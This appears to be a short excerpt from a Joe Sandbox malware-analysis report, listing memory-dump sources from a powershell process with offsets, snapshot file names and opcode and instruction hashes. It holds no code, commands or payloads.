              • Source File: 00000002.00000002.3353105237.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_7ff848e80000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fc234a267138446e82c0183c2f49f9066e5597097899d49d2aedc9a4af1d4338
              • Instruction ID: 295a7cf84150e807c5d5aba98f356cdaad62f7d759c2d73df9cb417aa361da24
              • Opcode Fuzzy Hash: fc234a267138446e82c0183c2f49f9066e5597097899d49d2aedc9a4af1d4338
              • Instruction Fuzzy Hash: EC11BF2090E2C58FE366A73858652697FE0FF83798F5901FED089CB0A3DA6D58458319
              Function 00007FF848DB41E5 Relevance: .0, Instructions: 49COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000002.00000002.3352113947.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_7ff848db0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: feb0186fa5a442a8601efe8cd9fda3dbab66340785de5c386d0276137d275872
              • Instruction ID: 2f20ca321a56f36b53e4e6699301160265553d4d1871140fa1bd9b5125ffe03c
              • Opcode Fuzzy Hash: feb0186fa5a442a8601efe8cd9fda3dbab66340785de5c386d0276137d275872
              • Instruction Fuzzy Hash: 4101447151CB084FDB44EF0CE451AA5B7E0FB95364F10056DE58AC3695D726E882CB45